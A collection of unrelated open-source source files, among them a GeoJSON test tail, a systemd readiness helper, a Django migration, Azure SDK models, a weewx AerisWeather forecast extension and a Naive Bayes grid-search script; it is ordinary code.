u'type': u'polygon', u'WKT': u' POLYGON ((35 10, 10 20, 15 40, 45 45, 35 10),(20 30, 35 35, 30 20, 20 30))'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'MultiPoint',
u'coordinates': [[10,
40],
[40,
30],
[20,
20],
[30,
10]]},
u'type': u'Feature',
u'id': 6,
u'properties': {u'type': u'multipoint',
u'WKT': u' MULTIPOINT ((10 40), (40 30), (20 20), (30 10))'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'MultiLineString',
u'coordinates': [[[10,
10],
[20,
20],
[10,
40]],
[[40,
40],
[30,
30],
[40,
20],
[30,
10]]]},
u'type': u'Feature',
u'id': 7,
u'properties': {u'type': u'multilinestring',
u'WKT': u' MULTILINESTRING ((10 10, 20 20, 10 40),(40 40, 30 30, 40 20, 30 10))'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'MultiPolygon',
u'coordinates': [[[[30,
20],
[45,
40],
[10,
40],
[30,
20]]],
[[[15,
5],
[40,
10],
[10,
20],
[5,
10],
[15,
5]]]]},
u'type': u'Feature',
u'id': 8,
u'properties': {u'type': u'multipolygon',
u'WKT': u' MULTIPOLYGON (((30 20, 10 40, 45 40, 30 20)),((15 5, 40 10, 10 20, 5 10, 15 5)))'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual, {u'geometry': {u'type': u'MultiPolygon', u'coordinates': [[[[40, 40], [20, 45], [45, 30], [40, 40]]], [[[20, 35], [10, 30], [10, 10], [30, 5], [45, 20], [20, 35]], [[30, 20], [20, 15], [20, 25], [
30, 20]]]]}, u'type': u'Feature', u'id': 9, u'properties': {u'type': u'multipolygon', u'WKT': u' MULTIPOLYGON (((40 40, 20 45, 45 30, 40 40)),((20 35, 45 20, 30 5, 10 10, 10 30, 20 35),(30 20, 20 25, 20 15, 30 20)))'}})
feat = fs.next()
actual = json.loads(feat.to_geojson())
eq_(actual,
{u'geometry': {u'type': u'GeometryCollection',
u'geometries': [{u'type': u'Polygon',
u'coordinates': [[[1,
1],
[2,
1],
[2,
2],
[1,
2],
[1,
1]]]},
{u'type': u'Point',
u'coordinates': [2,
3]},
{u'type': u'LineString',
u'coordinates': [[2,
3],
[3,
4]]}]},
u'type': u'Feature',
u'id': 10,
u'properties': {u'type': u'collection',
u'WKT': u' GEOMETRYCOLLECTION(POLYGON((1 1,2 1,2 2,1 2,1 1)),POINT(2 3),LINESTRING(2 3,3 4))'}})
if __name__ == "__main__":
setup()
exit(run_all(eval(x) for x in dir() if x.startswith("test_")))
|
miyakz1192/neutron
|
refs/heads/master
|
neutron/openstack/common/systemd.py
|
101
|
# Copyright 2012-2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Helper module for systemd service readiness notification.
"""
import logging
import os
import socket
import sys
LOG = logging.getLogger(__name__)
def _abstractify(socket_name):
if socket_name.startswith('@'):
# abstract namespace socket
socket_name = '\0%s' % socket_name[1:]
return socket_name
def _sd_notify(unset_env, msg):
notify_socket = os.getenv('NOTIFY_SOCKET')
if notify_socket:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
try:
sock.connect(_abstractify(notify_socket))
sock.sendall(msg)
if unset_env:
del os.environ['NOTIFY_SOCKET']
except EnvironmentError:
LOG.debug("Systemd notification failed", exc_info=True)
finally:
sock.close()
def notify():
"""Send notification to Systemd that service is ready.
For details see
http://www.freedesktop.org/software/systemd/man/sd_notify.html
"""
_sd_notify(False, 'READY=1')
def notify_once():
"""Send notification once to Systemd that service is ready.
Systemd sets NOTIFY_SOCKET environment variable with the name of the
socket listening for notifications from services.
This method removes the NOTIFY_SOCKET environment variable to ensure
notification is sent only once.
"""
_sd_notify(True, 'READY=1')
def onready(notify_socket, timeout):
"""Wait for systemd style notification on the socket.
:param notify_socket: local socket address
:type notify_socket: string
:param timeout: socket timeout
:type timeout: float
:returns: 0 service ready
1 service not ready
2 timeout occurred
"""
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.settimeout(timeout)
sock.bind(_abstractify(notify_socket))
try:
msg = sock.recv(512)
except socket.timeout:
return 2
finally:
sock.close()
if 'READY=1' in msg:
return 0
else:
return 1
if __name__ == '__main__':
# simple CLI for testing
if len(sys.argv) == 1:
notify()
elif len(sys.argv) >= 2:
timeout = float(sys.argv[1])
notify_socket = os.getenv('NOTIFY_SOCKET')
if notify_socket:
retval = onready(notify_socket, timeout)
sys.exit(retval)
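# A hedged round-trip sketch of the protocol above (abstract-namespace socket
# name is illustrative; run reader and writer in separate processes):
#
#     # reader:
#     rc = onready('@example_notify', 5.0)   # 0 ready, 1 not ready, 2 timeout
#
#     # writer:
#     os.environ['NOTIFY_SOCKET'] = '@example_notify'
#     notify_once()   # sends 'READY=1', then removes NOTIFY_SOCKET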
|
emawind84/readthedocs.org
|
refs/heads/master
|
readthedocs/builds/migrations/0001_initial.py
|
34
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import readthedocs.builds.version_slug
import taggit.managers
class Migration(migrations.Migration):
dependencies = [
('projects', '0001_initial'),
('taggit', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Build',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(default=b'html', max_length=55, verbose_name='Type', choices=[(b'html', 'HTML'), (b'pdf', 'PDF'), (b'epub', 'Epub'), (b'man', 'Manpage'), (b'dash', 'Dash')])),
('state', models.CharField(default=b'finished', max_length=55, verbose_name='State', choices=[(b'triggered', 'Triggered'), (b'cloning', 'Cloning'), (b'installing', 'Installing'), (b'building', 'Building'), (b'finished', 'Finished')])),
('date', models.DateTimeField(auto_now_add=True, verbose_name='Date')),
('success', models.BooleanField(default=True, verbose_name='Success')),
('setup', models.TextField(null=True, verbose_name='Setup', blank=True)),
('setup_error', models.TextField(null=True, verbose_name='Setup error', blank=True)),
('output', models.TextField(default=b'', verbose_name='Output', blank=True)),
('error', models.TextField(default=b'', verbose_name='Error', blank=True)),
('exit_code', models.IntegerField(null=True, verbose_name='Exit code', blank=True)),
('commit', models.CharField(max_length=255, null=True, verbose_name='Commit', blank=True)),
('length', models.IntegerField(null=True, verbose_name='Build Length', blank=True)),
('builder', models.CharField(max_length=255, null=True, verbose_name='Builder', blank=True)),
('project', models.ForeignKey(related_name='builds', verbose_name='Project', to='projects.Project')),
],
options={
'ordering': ['-date'],
'get_latest_by': 'date',
},
),
migrations.CreateModel(
name='Version',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(default=b'unknown', max_length=20, verbose_name='Type', choices=[(b'branch', 'Branch'), (b'tag', 'Tag'), (b'unknown', 'Unknown')])),
('identifier', models.CharField(max_length=255, verbose_name='Identifier')),
('verbose_name', models.CharField(max_length=255, verbose_name='Verbose Name')),
('slug', readthedocs.builds.version_slug.VersionSlugField(populate_from=b'verbose_name', max_length=255, verbose_name='Slug', db_index=True)),
('supported', models.BooleanField(default=True, verbose_name='Supported')),
('active', models.BooleanField(default=False, verbose_name='Active')),
('built', models.BooleanField(default=False, verbose_name='Built')),
('uploaded', models.BooleanField(default=False, verbose_name='Uploaded')),
('privacy_level', models.CharField(default=b'public', help_text='Level of privacy for this Version.', max_length=20, verbose_name='Privacy Level', choices=[(b'public', 'Public'), (b'protected', 'Protected'), (b'private', 'Private')])),
('machine', models.BooleanField(default=False, verbose_name='Machine Created')),
('project', models.ForeignKey(related_name='versions', verbose_name='Project', to='projects.Project')),
('tags', taggit.managers.TaggableManager(to='taggit.Tag', through='taggit.TaggedItem', blank=True, help_text='A comma-separated list of tags.', verbose_name='Tags')),
],
options={
'ordering': ['-verbose_name'],
'permissions': (('view_version', 'View Version'),),
},
),
migrations.CreateModel(
name='VersionAlias',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('from_slug', models.CharField(default=b'', max_length=255, verbose_name='From slug')),
('to_slug', models.CharField(default=b'', max_length=255, verbose_name='To slug', blank=True)),
('largest', models.BooleanField(default=False, verbose_name='Largest')),
('project', models.ForeignKey(related_name='aliases', verbose_name='Project', to='projects.Project')),
],
),
migrations.AddField(
model_name='build',
name='version',
field=models.ForeignKey(related_name='builds', verbose_name='Version', to='builds.Version', null=True),
),
migrations.AlterUniqueTogether(
name='version',
unique_together=set([('project', 'slug')]),
),
migrations.AlterIndexTogether(
name='build',
index_together=set([('version', 'state', 'type')]),
),
]
|
desteam/android_kernel_huawei_msm7x30
|
refs/heads/cm-12.0
|
tools/perf/util/setup.py
|
4998
|
#!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
self.build_lib = build_lib
self.build_temp = build_tmp
class install_lib(_install_lib):
def finalize_options(self):
_install_lib.finalize_options(self)
self.build_dir = build_lib
cflags = ['-fno-strict-aliasing', '-Wno-write-strings']
cflags += getenv('CFLAGS', '').split()
build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')
ext_sources = [f.strip() for f in file('util/python-ext-sources')
if len(f.strip()) > 0 and f[0] != '#']
perf = Extension('perf',
sources = ext_sources,
include_dirs = ['util/include'],
extra_compile_args = cflags,
)
setup(name='perf',
version='0.1',
description='Interface with the Linux profiling infrastructure',
author='Arnaldo Carvalho de Melo',
author_email='acme@redhat.com',
license='GPLv2',
url='http://perf.wiki.kernel.org',
ext_modules=[perf],
cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
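# A hedged invocation sketch (paths are illustrative; the perf Makefile
# normally exports these variables before calling this script):
#
#     import os, subprocess
#     env = dict(os.environ,
#                PYTHON_EXTBUILD_LIB='/tmp/pybuild/lib/',
#                PYTHON_EXTBUILD_TMP='/tmp/pybuild/tmp/')
#     subprocess.check_call(['python2', 'util/setup.py', 'build_ext'], env=env)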
|
zhakui/python
|
refs/heads/master
|
NKUCodingCat/0019/0019.py
|
40
|
#coding=utf-8
import xlrd, json, os
from lxml import etree
path = os.path.split(os.path.realpath(__file__))[0]+"/"
data = xlrd.open_workbook(path+"numbers.xls")
table = data.sheets()[0]
nrows = table.nrows
Dict = []
for i in range(nrows):
Arr = table.row_values(i)
Dict.append(Arr)
root = etree.Element("root")
child1 = etree.SubElement(root, "numbers")
comm = etree.Comment(u"""数字信息""")  # Chinese for "number information"
child1.append(comm)
child1.text = unicode(json.dumps(Dict).decode("utf-8"))
tree = etree.ElementTree(root)
tree.write(path+"numbers.xml", pretty_print=True, xml_declaration=True, encoding='utf-8')
|
SUSE/azure-sdk-for-python
|
refs/heads/master
|
azure-mgmt-compute/azure/mgmt/compute/compute/v2016_04_30_preview/models/sub_resource.py
|
29
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class SubResource(Model):
"""SubResource.
:param id: Resource Id
:type id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(self, id=None):
self.id = id
|
v-iam/azure-sdk-for-python
|
refs/heads/master
|
azure-mgmt-storage/azure/mgmt/storage/v2016_12_01/models/storage_account_regenerate_key_parameters.py
|
5
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class StorageAccountRegenerateKeyParameters(Model):
"""The parameters used to regenerate the storage account key.
:param key_name:
:type key_name: str
"""
_validation = {
'key_name': {'required': True},
}
_attribute_map = {
'key_name': {'key': 'keyName', 'type': 'str'},
}
def __init__(self, key_name):
self.key_name = key_name
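# A hedged construction sketch ('key1' and 'key2' are the two storage account
# key names accepted by the service):
#
#     params = StorageAccountRegenerateKeyParameters(key_name='key1')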
|
hes19073/hesweewx
|
refs/heads/master
|
bin/user/forecastAeris.py
|
1
|
# -*- coding: utf-8 -*-
# $Id: forecastAeris.py 1651 2020-09-24 12:10:37Z hes $
# original by Pat O'Brien, August 19, 2018
# Copyright 2020 Hartmut Schweidler
#
# Weather forecast by AerisWeather
""" in skin.conf
[Extras]
    # forecastAeris by aerisWeather
forecast_enabled = 0
# getAeris
forecast_provider = aeris
forecast_api_id =
    forecast_api_secret =
forecast_stale = 3450
# forecast_aeris_limit =
forecast_lang = de
forecast_units = si
"""
from __future__ import absolute_import
import datetime
import logging
import time
import calendar
import json
import os
import weewx
import weecfg
import weeutil.weeutil
import weeutil.logger
import weewx.units
from weewx.cheetahgenerator import SearchList
from weewx.tags import TimespanBinder
from weeutil.weeutil import TimeSpan
log = logging.getLogger(__name__)
# Print version in syslog
VERSION = "3.0.2"
log.info("Forecast AerisWeather version %s", VERSION)
class getAeris(SearchList):
def __init__(self, generator):
SearchList.__init__(self, generator)
def get_extension_list(self, timespan, db_lookup):
""" Download and parse the Forecast data.
        from AerisWeather
This is required for the majority of the theme to work
"""
# Setup label dict for text and titles
try:
d = self.generator.skin_dict['Labels']['Generic']
except KeyError:
d = {}
label_dict = weeutil.weeutil.KeyDict(d)
# Setup database manager
binding = self.generator.config_dict['StdReport'].get('data_binding', 'wx_binding')
manager = self.generator.db_binder.get_manager(binding)
# Find the right HTML ROOT
if 'HTML_ROOT' in self.generator.skin_dict:
html_root = os.path.join(self.generator.config_dict['WEEWX_ROOT'],
self.generator.skin_dict['HTML_ROOT'])
else:
html_root = os.path.join(self.generator.config_dict['WEEWX_ROOT'],
self.generator.config_dict['StdReport']['HTML_ROOT'])
# Return right away if we're not going to use the forecast.
if self.generator.skin_dict['Extras']['forecast_enabled'] == "0":
# Return an empty SLE
search_list_extension = {
'forecast_updated': '',
'forecastHTML' : '',
}
return [search_list_extension]
"""
Forecast Data
"""
forecast_provider = self.generator.skin_dict['Extras']['forecast_provider']
forecast_file = "/home/weewx/archive/forecastAeris.json"
forecast_api_id = self.generator.skin_dict['Extras']['forecast_api_id']
forecast_api_secret = self.generator.skin_dict['Extras']['forecast_api_secret']
forecast_units = self.generator.skin_dict['Extras']['forecast_units'].lower()
latitude = self.generator.config_dict['Station']['latitude']
longitude = self.generator.config_dict['Station']['longitude']
forecast_stale_timer = self.generator.skin_dict['Extras']['forecast_stale']
forecast_is_stale = False
def aeris_coded_weather(data):
# https://www.aerisweather.com/support/docs/api/reference/weather-codes/
output = ""
coverage_code = data.split(":")[0]
intensity_code = data.split(":")[1]
weather_code = data.split(":")[2]
cloud_dict = {
"CL": label_dict["forecast_cloud_code_CL"],
"FW": label_dict["forecast_cloud_code_FW"],
"SC": label_dict["forecast_cloud_code_SC"],
"BK": label_dict["forecast_cloud_code_BK"],
"OV": label_dict["forecast_cloud_code_OV"],
}
coverage_dict = {
"AR": label_dict["forecast_coverage_code_AR"],
"BR": label_dict["forecast_coverage_code_BR"],
"C": label_dict["forecast_coverage_code_C"],
"D": label_dict["forecast_coverage_code_D"],
"FQ": label_dict["forecast_coverage_code_FQ"],
"IN": label_dict["forecast_coverage_code_IN"],
"IS": label_dict["forecast_coverage_code_IS"],
"L": label_dict["forecast_coverage_code_L"],
"NM": label_dict["forecast_coverage_code_NM"],
"O": label_dict["forecast_coverage_code_O"],
"PA": label_dict["forecast_coverage_code_PA"],
"PD": label_dict["forecast_coverage_code_PD"],
"S": label_dict["forecast_coverage_code_S"],
"SC": label_dict["forecast_coverage_code_SC"],
"VC": label_dict["forecast_coverage_code_VC"],
"WD": label_dict["forecast_coverage_code_WD"],
}
intensity_dict = {
"VL": label_dict["forecast_intensity_code_VL"],
"L": label_dict["forecast_intensity_code_L"],
"H": label_dict["forecast_intensity_code_H"],
"VH": label_dict["forecast_intensity_code_VH"],
}
weather_dict = {
"A": label_dict["forecast_weather_code_A"],
"BD": label_dict["forecast_weather_code_BD"],
"BN": label_dict["forecast_weather_code_BN"],
"BR": label_dict["forecast_weather_code_BR"],
"BS": label_dict["forecast_weather_code_BS"],
"BY": label_dict["forecast_weather_code_BY"],
"F": label_dict["forecast_weather_code_F"],
"FR": label_dict["forecast_weather_code_FR"],
"H": label_dict["forecast_weather_code_H"],
"IC": label_dict["forecast_weather_code_IC"],
"IF": label_dict["forecast_weather_code_IF"],
"IP": label_dict["forecast_weather_code_IP"],
"K": label_dict["forecast_weather_code_K"],
"L": label_dict["forecast_weather_code_L"],
"R": label_dict["forecast_weather_code_R"],
"RW": label_dict["forecast_weather_code_RW"],
"RS": label_dict["forecast_weather_code_RS"],
"SI": label_dict["forecast_weather_code_SI"],
"WM": label_dict["forecast_weather_code_WM"],
"S": label_dict["forecast_weather_code_S"],
"SW": label_dict["forecast_weather_code_SW"],
"T": label_dict["forecast_weather_code_T"],
"UP": label_dict["forecast_weather_code_UP"],
"VA": label_dict["forecast_weather_code_VA"],
"WP": label_dict["forecast_weather_code_WP"],
"ZF": label_dict["forecast_weather_code_ZF"],
"ZL": label_dict["forecast_weather_code_ZL"],
"ZR": label_dict["forecast_weather_code_ZR"],
"ZY": label_dict["forecast_weather_code_ZY"],
}
# Check if the weather_code is in the cloud_dict and use that if it's there. If not then it's a combined weather code.
if weather_code in cloud_dict:
return cloud_dict[weather_code];
else:
# Add the coverage if it's present, and full observation forecast is requested
if coverage_code:
output += coverage_dict[coverage_code] + " : "
# Add the intensity if it's present
if intensity_code:
output += intensity_dict[intensity_code] + " : "
# Weather output
output += weather_dict[weather_code];
return output
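        # Illustrative decodings of the coverage:intensity:weather codes handled
        # above (the exact strings returned depend on the skin's Labels section):
        #   aeris_coded_weather('::S')     -> snow label only
        #   aeris_coded_weather('L:VL:RW') -> likely : very light : rain showers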
def aeris_icon(data):
# https://www.aerisweather.com/support/docs/api/reference/icon-list/
icon_name = data.split(".")[0]; # Remove .png
icon_dict = {
"blizzard": "snow",
"blizzardn": "snow",
"blowingsnow": "snow",
"blowingsnown": "snow",
"clear": "clear-day",
"clearn": "clear-night",
"cloudy": "cloudy",
"cloudyn": "cloudy",
"cloudyw": "cloudy",
"cloudywn": "cloudy",
"cold": "clear-day",
"coldn": "clear-night",
"drizzle": "rain",
"drizzlen": "rain",
"dust": "fog",
"dustn": "fog",
"fair": "clear-day",
"fairn": "clear-night",
"drizzlef": "rain",
"fdrizzlen": "rain",
"flurries": "sleet",
"flurriesn": "sleet",
"flurriesw": "sleet",
"flurrieswn": "sleet",
"fog": "fog",
"fogn": "fog",
"freezingrain": "rain",
"freezingrainn": "rain",
"hazy": "fog",
"hazyn": "fog",
"hot": "clear-day",
"N/A ": "unknown",
"mcloudy": "partly-cloudy-day",
"mcloudyn": "partly-cloudy-night",
"mcloudyr": "rain",
"mcloudyrn": "rain",
"mcloudyrw": "rain",
"mcloudyrwn": "rain",
"mcloudys": "snow",
"mcloudysn": "snow",
"mcloudysf": "snow",
"mcloudysfn": "snow",
"mcloudysfw": "snow",
"mcloudysfwn": "snow",
"mcloudysw": "partly-cloudy-day",
"mcloudyswn": "partly-cloudy-night",
"mcloudyt": "thunderstorm",
"mcloudytn": "thunderstorm",
"mcloudytw": "thunderstorm",
"mcloudytwn": "thunderstorm",
"mcloudyw": "partly-cloudy-day",
"mcloudywn": "partly-cloudy-night",
"na": "unknown",
"pcloudy": "partly-cloudy-day",
"pcloudyn": "partly-cloudy-night",
"pcloudyr": "rain",
"pcloudyrn": "rain",
"pcloudyrw": "rain",
"pcloudyrwn": "rain",
"pcloudys": "snow",
"pcloudysn": "snow",
"pcloudysf": "snow",
"pcloudysfn": "snow",
"pcloudysfw": "snow",
"pcloudysfwn": "snow",
"pcloudysw": "partly-cloudy-day",
"pcloudyswn": "partly-cloudy-night",
"pcloudyt": "thunderstorm",
"pcloudytn": "thunderstorm",
"pcloudytw": "thunderstorm",
"pcloudytwn": "thunderstorm",
"pcloudyw": "partly-cloudy-day",
"pcloudywn": "partly-cloudy-night",
"rain": "rain",
"rainn": "rain",
"rainandsnow": "rain",
"rainandsnown": "rain",
"raintosnow": "rain",
"raintosnown": "rain",
"rainw": "rain",
"rainw": "rain",
"showers": "rain",
"showersn": "rain",
"showersw": "rain",
"showersw": "rain",
"sleet": "sleet",
"sleetn": "sleet",
"sleetsnow": "sleet",
"sleetsnown": "sleet",
"smoke": "fog",
"smoken": "fog",
"snow": "snow",
"snown": "snow",
"snoww": "snow",
"snowwn": "snow",
"snowshowers": "snow",
"snowshowersn": "snow",
"snowshowersw": "snow",
"snowshowerswn": "snow",
"snowtorain": "snow",
"snowtorainn": "snow",
"sunny": "clear-day",
"sunnyn": "clear-night",
"sunnyw": "partly-cloudy-day",
"sunnywn": "partly-cloudy-night",
"tstorm": "thunderstorm",
"tstormn": "thunderstorm",
"tstorms": "thunderstorm",
"tstormsn": "thunderstorm",
"tstormsw": "thunderstorm",
"tstormswn": "thunderstorm",
"wind": "wind",
"wind": "wind",
"wintrymix": "sleet",
"wintrymixn": "sleet",
}
return icon_dict[icon_name]
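        # Illustrative lookups for the mapping above:
        #   aeris_icon('pcloudyn.png') -> 'partly-cloudy-night'
        #   aeris_icon('tstorms.png')  -> 'thunderstorm'
        # Unknown icon names raise KeyError, so new Aeris icons need an entry here.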
        # Source
forecast_url = "https://api.aerisapi.com/forecasts/%s,%s?&format=json&filter=day&limit=7&client_id=%s&client_secret=%s" % (latitude, longitude, forecast_api_id, forecast_api_secret)
        # Determine if the file exists and get its modified time
if os.path.isfile(forecast_file):
if (int(time.time()) - int(os.path.getmtime(forecast_file))) > int(forecast_stale_timer):
forecast_is_stale = True
else:
# File doesn't exist, download a new copy
forecast_is_stale = True
# File is stale, download a new copy
if forecast_is_stale:
try:
try:
# Python 3
from urllib.request import Request, urlopen
except ImportError:
# Python 2
from urllib2 import Request, urlopen
user_agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3'
headers = { 'User-Agent' : user_agent }
# Forecast
req = Request( forecast_url, None, headers )
response = urlopen( req )
forecast_page = response.read()
response.close()
try:
forecast_file_result = json.dumps( {"timestamp": int(time.time()), "forecast": [json.loads(forecast_page)]} )
except:
forecast_file_result = json.dumps( {"timestamp": int(time.time()), "forecast": [json.loads(forecast_page.decode('utf-8'))]} )
except Exception as error:
raise Warning( "Error downloading forecast data. Check the URL in your configuration and try again. You are trying to use URL: %s, and the error is: %s" % ( forecast_url, error ) )
            # Save forecast data to file. w+ creates the file if it doesn't exist, and truncates the file and re-writes it every time
try:
with open( forecast_file, 'wb+' ) as file:
# Python 2/3
try:
file.write( forecast_file_result.encode('utf-8') )
except:
file.write( forecast_file_result )
log.info( "New forecast file downloaded to %s" % forecast_file )
except IOError as e:
raise Warning( "Error writing forecast info to %s. Reason: %s" % ( forecast_file, e) )
# Process the forecast file
with open( forecast_file, "r" ) as read_file:
data = json.load( read_file )
html_output = ""
#forecast_updated = time.strftime("%d.%m.%Y %H:%M", time.localtime(data["forecast"][0]["response"][0]["periods"][0]["timestamp"]))
forecast_updated = time.strftime("%d.%m.%Y %H:%M", time.localtime(data["timestamp"]))
for daily_data in data["forecast"][0]["response"][0]["periods"]:
image_url = "xicons/AerisIcons/" + daily_data['icon']
condition_text = aeris_coded_weather(daily_data["weatherPrimaryCoded"])
#condition_text = daily_data["weatherPrimary"]
# Build html
if time.strftime( "%a %m/%d", time.localtime( daily_data["timestamp"] ) ) == time.strftime( "%a %m/%d", time.localtime( time.time() ) ):
            # If the time in the Aeris output is today, do not add border-left and say "Today" in the header
output = '<div class="col-sm-1-5 wuforecast">'
weekday = "Heute"
else:
output = '<div class="col-sm-1-5 wuforecast border-left">'
weekday = time.strftime( "%a: %d.%m.%Y", time.localtime( daily_data["timestamp"] ) )
output += '<span id="weekday">' + weekday + '</span>'
output += '<br>'
output += '<div class="forecast-conditions">'
output += '<img id="icon" src="'+image_url+'">'
output += '<br>'
output += '<span class="forecast-condition-text">'
output += condition_text
output += '</span>'
output += '</div>'
output += '<span class="hes1_valhi">'+str(int(daily_data["maxTempC"])) + '°C</span> | <span class="hes1_vallo">'+str(int(daily_data["minTempC"]))+ '°C</span>'
output += '<br><br>'
output += '<div class="forecast-precip">'
if int(daily_data["pop"]) > 0:
output += 'Niederschlag: <span> ' + str(int(daily_data["pop"])) + ' </span>%'
if int(daily_data["snowCM"]) > 0:
output += '<div class="snow-precip">'
output += '<img src="xicons/snowflake-icon-15px.png"> <span>'+ str(int(daily_data["snowCM"])) + '</span> cm'
output += '</div>'
elif int(daily_data["precipMM"]) > 0:
output += '<div class="rain-precip">'
output += '<img src="xicons/raindrop.png"><span >'+ str(int(daily_data["precipMM"])) + ' </span> mm'
output += '</div>'
else:
output += 'Niederschlag: <span > 0%</span>'
output += '</div>'
output += '<div class="forecast-wind">'
output += '<img src="xicons/strong-wind.svg"><span> aus: <b>' + daily_data["windDir"] + '</b></span><br>'
output += '<span> '+ str(int(daily_data["windSpeedKPH"])) + ' bis ' + str(int(daily_data["windGustKPH"])) + ' km/h </span><br>'
output += '<img src="xicons/strong-wind.svg"><span>in 80 m: <b>' + daily_data["windDir80m"] + '</b></span><br>'
output += '<span> '+ str(int(daily_data["windSpeed80mKPH"])) + ' bis ' + str(int(daily_data["windGust80mKPH"])) + ' km/h </span>'
output += '</div> <!-- end wind --> '
output += '</div> <!-- end aeris forecast -->'
output += '<br>'
# Add to the output
html_output += output
# Put into a dictionary to return
search_list_extension = {
'forecast_updated': forecast_updated,
'forecastHTML' : html_output,
}
# Finally, return our extension as a list:
return [search_list_extension]
|
rasbt/bugreport
|
refs/heads/master
|
scikit-learn/gridsearch_memory/code/naive_bayes_scripts/bernoulli_gridsearch_1.py
|
1
|
# Sebastian Raschka 2014
import os
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.grid_search import GridSearchCV
from time import time
from sklearn.pipeline import Pipeline
from sklearn.naive_bayes import MultinomialNB, BernoulliNB
import pandas as pd
from nltk.stem.porter import PorterStemmer
from nltk.stem.snowball import EnglishStemmer
import pickle
from sklearn import cross_validation
master_dir = os.path.dirname(os.path.realpath(__file__))
###########################################
# Setting up tokenizer
###########################################
stop_words = pickle.load(open(os.path.join(master_dir, '../stopwords.p'), 'rb'))
semantic_words = pickle.load((open(os.path.join(master_dir, '../whitelist/semantic_words.p'), 'rb')))
porter = PorterStemmer()
snowball = EnglishStemmer()
# raw words
# tokenizer = lambda text: text.split()
def tokenizer(text):
return text.split()
# words after Porter stemming
# tokenizer_porter = lambda text: [porter.stem(word) for word in text.split()]
def tokenizer_porter(text):
return [porter.stem(word) for word in text.split()]
# Words after Snowball stemming
# tokenizer_snowball = lambda text: [snowball.stem(word) for word in text.split()]
def tokenizer_snowball(text):
return [snowball.stem(word) for word in text.split()]
# Only words that are in a list of 'positive' or 'negative' words ('whitelist')
# http://www.cs.uic.edu/~liub/FBS/sentiment-analysis.html#lexicon
#tokenizer_whitelist = lambda text: [word for word in text.split() if word in semantic_words]
def tokenizer_whitelist(text):
return [word for word in text.split() if word in semantic_words]
# Porter-stemmed words in whitelist
# tokenizer_porter_wl = lambda text: [porter.stem(word) for word in text.split() if word in semantic_words]
def tokenizer_porter_wl(text):
return [porter.stem(word) for word in text.split() if word in semantic_words]
# Snowball-stemmed words in whitelist
# tokenizer_snowball_wl = lambda text: [snowball.stem(word) for word in text.split() if word in semantic_words]
def tokenizer_snowball_wl(text):
return [snowball.stem(word) for word in text.split() if word in semantic_words]
###########################################
# Loading training data
###########################################
df_train = pd.read_csv(os.path.join(master_dir, '../../data/labeledTrainData.tsv'), sep='\t', quoting=3)
df_test = pd.read_csv(os.path.join(master_dir, '../../data/testData.tsv'), sep='\t', quoting=3)
X_train = df_train['review']
y_train = df_train['sentiment']
###########################################
# Pipeline of feature extractor, classifier, and parameters
###########################################
pipeline_ber = Pipeline([
('vec', CountVectorizer(binary=True)),
('clf', BernoulliNB())])
parameters_ber = {
'vec__tokenizer': (tokenizer, tokenizer_porter, tokenizer_snowball,
tokenizer_whitelist, tokenizer_porter_wl, tokenizer_snowball_wl),
'vec__max_df': (0.5, 0.75, 1.0),
'vec__max_features': (None, 5000),
'vec__min_df': (1, 50),
'vec__stop_words': [None, stop_words],
'vec__ngram_range' : [(1,1), (1,2), (2,2)],}
###########################################
## Run GridSearch
###########################################
grid_search = GridSearchCV(pipeline_ber,
parameters_ber,
n_jobs=1,
cv=3,
scoring='roc_auc',
verbose=2)
t0 = time()
print('Start Gridsearch')
grid_search.fit(X_train, y_train)
print('\n\n\n\n{0}\nREPORT\n{0} '.format(50*'#'))
print('done in {0}s'.format(time() - t0))
print('Best score: {0}'.format(grid_search.best_score_))
print('Best parameters set:')
best_parameters = grid_search.best_estimator_.get_params()
for param_name in sorted(list(parameters_ber.keys())):
print('\t{0}: {1}'.format(param_name, best_parameters[param_name]))
print('\n\n\n All Scores:')
print(grid_search.grid_scores_)
|
